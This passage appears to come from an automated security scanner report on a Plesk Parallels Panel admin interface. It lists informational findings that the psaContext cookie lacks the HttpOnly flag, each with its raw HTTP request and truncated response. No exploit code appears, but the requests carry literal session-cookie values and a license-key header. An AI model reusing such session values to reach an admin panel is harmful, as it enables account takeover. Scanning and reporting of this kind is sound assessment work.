Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=dashboard; path=/
Date: Fri, 23 Sep 2011 18:34:33 GMT
Server: sw-cp-server
Content-Length: 18650

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <link rel="shortcut icon"
...[SNIP]...

5.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /license.php3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /license.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:32:37 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=dashboard; path=/
Date: Fri, 23 Sep 2011 18:32:37 GMT
Server: sw-cp-server
Content-Length: 23854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <link rel="shortcut icon
...[SNIP]...

5.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /login_up.php3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login_up.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BarExpanded=True; PHPSESSID=e4155988e1f250b6a55cb24dea872fd0; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:19:18 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Plesk: PSA-Key/PLSK016479390000
Set-Cookie: psaContext=customers; path=/
Date: Fri, 23 Sep 2011 19:19:18 GMT
Server: sw-cp-server
Content-Length: 5389

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Cont
...[SNIP]...

5.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-info/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-info/?context=personal-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:12:11 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=personal-info; path=/
Date: Fri, 23 Sep 2011 19:12:11 GMT
Server: sw-cp-server
Content-Length: 20512

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="067
...[SNIP]...

5.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-password/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/admin-password/?context=credentials-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:42:30 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=credentials-info; path=/
Date: Fri, 23 Sep 2011 19:42:30 GMT
Server: sw-cp-server
Content-Length: 9194

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="6cf
...[SNIP]...

5.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain-summary-report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/domain-summary-report/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain-summary-report/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:53:20 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:53:20 GMT
Server: sw-cp-server
Content-Length: 9186

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="1ab
...[SNIP]...

5.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/domain@any/traffic/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:19 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:27:19 GMT
Server: sw-cp-server
Content-Length: 9102

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/ipaddress@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/ipaddress@/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/ipaddress@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:27:12 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:27:12 GMT
Server: sw-cp-server
Content-Length: 9058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@3/skeleton/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/skeleton/?cmd=chdir&file=%2F HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:30:52 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:52 GMT
Server: sw-cp-server
Content-Length: 22069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@4/domain@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@4/domain@any/traffic/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@4/domain@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:54:19 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:54:19 GMT
Server: sw-cp-server
Content-Length: 9272

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="1ab
...[SNIP]...

5.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@5/domain@any/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/client@5/domain@any/traffic/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@5/domain@any/traffic/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:27:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=reseller-tools; path=/
Date: Sat, 24 Sep 2011 15:27:13 GMT
Server: sw-cp-server
Content-Length: 9412

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/ftp-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/ftp-repository/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 16:05:25 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=service-plans; path=/
Date: Sat, 24 Sep 2011 16:05:25 GMT
Server: sw-cp-server
Content-Length: 13490

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="094
...[SNIP]...

5.43. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/ftp-repository/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/ftp-repository/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:13 GMT
Server: sw-cp-server
Content-Length: 8796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/create/
Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:23 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:23 GMT
Server: sw-cp-server
Content-Length: 25816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.45. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/backup/local-repository/item@0x1135f24286ba733f8714152a1ddbd67c/restore/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
